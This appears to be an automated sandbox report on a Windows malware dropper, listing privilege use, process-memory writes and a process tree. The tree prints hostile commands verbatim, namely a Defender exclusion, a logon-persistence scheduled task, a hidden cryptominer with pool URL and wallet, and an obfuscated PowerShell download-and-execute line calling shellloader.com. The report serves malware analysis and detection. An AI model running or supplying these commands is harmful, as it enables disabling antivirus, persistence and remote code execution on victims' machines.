Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	3472	WerFault.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	5176	3920795.exe
Token: SeRestorePrivilege	5708	WerFault.exe
Token: SeBackupPrivilege	5708	WerFault.exe
Token: SeBackupPrivilege	5708	WerFault.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	4320	zab2our.exe
Token: SeDebugPrivilege	5708	WerFault.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeDebugPrivilege	4820	rundll32.exe
Token: SeShutdownPrivilege	2800	Process not Found
Token: SeCreatePagefilePrivilege	2800	Process not Found
Token: SeAuditPrivilege	2280	svchost.exe
Token: SeShutdownPrivilege	2800	Process not Found
Token: SeCreatePagefilePrivilege	2800	Process not Found
Token: SeShutdownPrivilege	2800	Process not Found
Token: SeCreatePagefilePrivilege	2800	Process not Found
Token: SeShutdownPrivilege	2800	Process not Found
Token: SeCreatePagefilePrivilege	2800	Process not Found
Token: SeShutdownPrivilege	2800	Process not Found
Token: SeCreatePagefilePrivilege	2800	Process not Found
Token: SeShutdownPrivilege	2800	Process not Found
Token: SeCreatePagefilePrivilege	2800	Process not Found
Token: SeDebugPrivilege	5596	8972360.exe
Token: SeAuditPrivilege	2280	svchost.exe
Token: SeDebugPrivilege	5320	WerFault.exe
Token: SeShutdownPrivilege	2800	Process not Found
Token: SeCreatePagefilePrivilege	2800	Process not Found
Token: SeAssignPrimaryTokenPrivilege	2652	svchost.exe
Token: SeIncreaseQuotaPrivilege	2652	svchost.exe
Token: SeSecurityPrivilege	2652	svchost.exe
Token: SeTakeOwnershipPrivilege	2652	svchost.exe
Token: SeLoadDriverPrivilege	2652	svchost.exe
Token: SeSystemtimePrivilege	2652	svchost.exe
Token: SeBackupPrivilege	2652	svchost.exe
Token: SeRestorePrivilege	2652	svchost.exe
Token: SeShutdownPrivilege	2652	svchost.exe
Token: SeSystemEnvironmentPrivilege	2652	svchost.exe
Token: SeUndockPrivilege	2652	svchost.exe
Token: SeManageVolumePrivilege	2652	svchost.exe
Token: SeShutdownPrivilege	2800	Process not Found
Token: SeCreatePagefilePrivilege	2800	Process not Found
Token: SeShutdownPrivilege	2800	Process not Found
Token: SeCreatePagefilePrivilege	2800	Process not Found
Token: SeShutdownPrivilege	2800	Process not Found
Token: SeCreatePagefilePrivilege	2800	Process not Found

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
5188	setup_2.tmp
2620	ultramediaburner.tmp
728	installer.exe
2800	Process not Found
2800	Process not Found
2800	Process not Found
2800	Process not Found
2800	Process not Found
2800	Process not Found

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2800	Process not Found
6976	MicrosoftEdge.exe
6324	cmd.exe
7220	MicrosoftEdgeCP.exe
7220	MicrosoftEdgeCP.exe
8036	MicrosoftEdge.exe
6652	MicrosoftEdgeCP.exe
6652	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4336 wrote to memory of 4716	4336	setup_x86_x64_install.exe	81
PID 4336 wrote to memory of 4716	4336	setup_x86_x64_install.exe	81
PID 4336 wrote to memory of 4716	4336	setup_x86_x64_install.exe	81
PID 4716 wrote to memory of 4776	4716	setup_installer.exe	82
PID 4716 wrote to memory of 4776	4716	setup_installer.exe	82
PID 4716 wrote to memory of 4776	4716	setup_installer.exe	82
PID 4776 wrote to memory of 2824	4776	setup_install.exe	85
PID 4776 wrote to memory of 2824	4776	setup_install.exe	85
PID 4776 wrote to memory of 2824	4776	setup_install.exe	85
PID 4776 wrote to memory of 4600	4776	setup_install.exe	86
PID 4776 wrote to memory of 4600	4776	setup_install.exe	86
PID 4776 wrote to memory of 4600	4776	setup_install.exe	86
PID 4776 wrote to memory of 5072	4776	setup_install.exe	87
PID 4776 wrote to memory of 5072	4776	setup_install.exe	87
PID 4776 wrote to memory of 5072	4776	setup_install.exe	87
PID 4776 wrote to memory of 5112	4776	setup_install.exe	94
PID 4776 wrote to memory of 5112	4776	setup_install.exe	94
PID 4776 wrote to memory of 5112	4776	setup_install.exe	94
PID 4776 wrote to memory of 892	4776	setup_install.exe	93
PID 4776 wrote to memory of 892	4776	setup_install.exe	93
PID 4776 wrote to memory of 892	4776	setup_install.exe	93
PID 4776 wrote to memory of 380	4776	setup_install.exe	88
PID 4776 wrote to memory of 380	4776	setup_install.exe	88
PID 4776 wrote to memory of 380	4776	setup_install.exe	88
PID 4776 wrote to memory of 632	4776	setup_install.exe	89
PID 4776 wrote to memory of 632	4776	setup_install.exe	89
PID 4776 wrote to memory of 632	4776	setup_install.exe	89
PID 4776 wrote to memory of 960	4776	setup_install.exe	91
PID 4776 wrote to memory of 960	4776	setup_install.exe	91
PID 4776 wrote to memory of 960	4776	setup_install.exe	91
PID 5072 wrote to memory of 1088	5072	cmd.exe	90
PID 5072 wrote to memory of 1088	5072	cmd.exe	90
PID 5072 wrote to memory of 1088	5072	cmd.exe	90
PID 4600 wrote to memory of 1204	4600	cmd.exe	92
PID 4600 wrote to memory of 1204	4600	cmd.exe	92
PID 4600 wrote to memory of 1204	4600	cmd.exe	92
PID 2824 wrote to memory of 1400	2824	cmd.exe	95
PID 2824 wrote to memory of 1400	2824	cmd.exe	95
PID 2824 wrote to memory of 1400	2824	cmd.exe	95
PID 892 wrote to memory of 1680	892	cmd.exe	98
PID 892 wrote to memory of 1680	892	cmd.exe	98
PID 960 wrote to memory of 1716	960	cmd.exe	97
PID 960 wrote to memory of 1716	960	cmd.exe	97
PID 380 wrote to memory of 1832	380	cmd.exe	96
PID 380 wrote to memory of 1832	380	cmd.exe	96
PID 380 wrote to memory of 1832	380	cmd.exe	96
PID 5112 wrote to memory of 2192	5112	cmd.exe	99
PID 5112 wrote to memory of 2192	5112	cmd.exe	99
PID 5112 wrote to memory of 2192	5112	cmd.exe	99
PID 2192 wrote to memory of 2932	2192	Fri157e25afd971.exe	100
PID 2192 wrote to memory of 2932	2192	Fri157e25afd971.exe	100
PID 2192 wrote to memory of 2932	2192	Fri157e25afd971.exe	100
PID 1716 wrote to memory of 1288	1716	Fri1553f0ee90.exe	101
PID 1716 wrote to memory of 1288	1716	Fri1553f0ee90.exe	101
PID 1716 wrote to memory of 1288	1716	Fri1553f0ee90.exe	101
PID 1288 wrote to memory of 4780	1288	LzmwAqmV.exe	102
PID 1288 wrote to memory of 4780	1288	LzmwAqmV.exe	102
PID 2932 wrote to memory of 4320	2932	Fri157e25afd971.tmp	103
PID 2932 wrote to memory of 4320	2932	Fri157e25afd971.tmp	103
PID 1288 wrote to memory of 2176	1288	LzmwAqmV.exe	104
PID 1288 wrote to memory of 2176	1288	LzmwAqmV.exe	104
PID 1288 wrote to memory of 4416	1288	LzmwAqmV.exe	105
PID 1288 wrote to memory of 4416	1288	LzmwAqmV.exe	105
PID 1680 wrote to memory of 4756	1680	Fri155442fc38b.exe	129

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2664

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2652

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2280

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1308

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1188

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1068
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:6752
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:7320
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:7932
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:7320
- C:\Users\Admin\AppData\Roaming\thrbucb
  C:\Users\Admin\AppData\Roaming\thrbucb
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5472
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:6756
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:1776
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:6980
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:3960
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:8140
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:5600
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  - Executes dropped EXE
  PID:7496
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:4884
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:2872
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:1436
- C:\Users\Admin\AppData\Roaming\thrbucb
  C:\Users\Admin\AppData\Roaming\thrbucb
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5116
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:208
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:8016
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:2128
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:5956
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:6240
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:5156
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:5824
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:7728
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:7884
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:1992
- C:\Users\Admin\AppData\Roaming\thrbucb
  C:\Users\Admin\AppData\Roaming\thrbucb
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5704
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:5376
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:4708
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:5176
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:4196
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:436

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4336
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4716
- - C:\Users\Admin\AppData\Local\Temp\7zSC6266554\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSC6266554\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4776
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2824
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4600
    - - C:\Users\Admin\AppData\Local\Temp\7zSC6266554\Fri1544861ac3fe6a.exe
        
        Fri1544861ac3fe6a.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1204
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 772
        6⤵
        Drops file in Windows directory
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5708
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 816
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:5320
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 736
        6⤵
        Program crash
        
        PID:5604
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 828
        6⤵
        Program crash
        
        PID:4552
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 960
        6⤵
        Program crash
        
        PID:6048
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 988
        6⤵
        Program crash
        
        PID:4508
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1020
        6⤵
        Program crash
        
        PID:2996
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1108
        6⤵
        Program crash
        
        PID:5996
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1432
        6⤵
        Program crash
        
        PID:5712
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1560
        6⤵
        Program crash
        
        PID:6308
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1564
        6⤵
        Program crash
        
        PID:5000
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1676
        6⤵
        Program crash
        
        PID:6736
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1596
        6⤵
        Program crash
        
        PID:7052
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1712
        6⤵
        Program crash
        
        PID:4136
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1716
        6⤵
        Program crash
        
        PID:7704
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1632
        6⤵
        Program crash
        
        PID:7672
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1716
        6⤵
        Program crash
        
        PID:7912
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1564
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:6148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5072
    - - C:\Users\Admin\AppData\Local\Temp\7zSC6266554\Fri156ec98815f89c.exe
        
        Fri156ec98815f89c.exe
        5⤵
        Executes dropped EXE
        
        PID:1088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:380
    - - C:\Users\Admin\AppData\Local\Temp\7zSC6266554\Fri15af75ee9b.exe
        
        Fri15af75ee9b.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c APPNAME7.exe
      4⤵
      PID:632
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:960
    - - C:\Users\Admin\AppData\Local\Temp\7zSC6266554\Fri1553f0ee90.exe
        
        Fri1553f0ee90.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1716
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:4400
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:5020
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6204
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:6520
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:7356
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        Executes dropped EXE
        
        PID:7628
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:6564
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2176
        
        C:\Users\Admin\AppData\Roaming\3920795.exe
        
        "C:\Users\Admin\AppData\Roaming\3920795.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5176
        
        C:\Users\Admin\AppData\Roaming\6686198.exe
        
        "C:\Users\Admin\AppData\Roaming\6686198.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:5476
        
        C:\Users\Admin\AppData\Roaming\2926759.exe
        
        "C:\Users\Admin\AppData\Roaming\2926759.exe"
        8⤵
        Executes dropped EXE
        
        PID:5912
        
        C:\Users\Admin\AppData\Roaming\1565591.exe
        
        "C:\Users\Admin\AppData\Roaming\1565591.exe"
        8⤵
        Executes dropped EXE
        
        PID:4588
        
        C:\Users\Admin\AppData\Roaming\8667013.exe
        
        "C:\Users\Admin\AppData\Roaming\8667013.exe"
        8⤵
        Executes dropped EXE
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4416
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4416 -s 1556
        8⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:3816
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 800
        8⤵
        Program crash
        
        PID:1660
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 832
        8⤵
        Executes dropped EXE
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 852
        8⤵
        Program crash
        
        PID:5732
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 900
        8⤵
        Program crash
        
        PID:5924
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 984
        8⤵
        Program crash
        
        PID:4732
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 1260
        8⤵
        Program crash
        
        PID:848
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 1260
        8⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:5844
        
        C:\Users\Admin\AppData\Local\Temp\Pubdate.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"
        7⤵
        Executes dropped EXE
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:1828
        
        C:\Users\Admin\AppData\Local\Temp\is-TP9MN.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TP9MN.tmp\setup_2.tmp" /SL5="$20210,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\is-KS7LF.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KS7LF.tmp\setup_2.tmp" /SL5="$1029C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\is-CAFBM.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CAFBM.tmp\postback.exe" ss1
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3156
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        12⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        13⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        14⤵
        Blocklisted process makes network request
        
        PID:6624
        
        C:\Users\Admin\AppData\Local\Temp\wKX1KQHYx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wKX1KQHYx.exe"
        13⤵
        Executes dropped EXE
        
        PID:6812
        
        C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
        
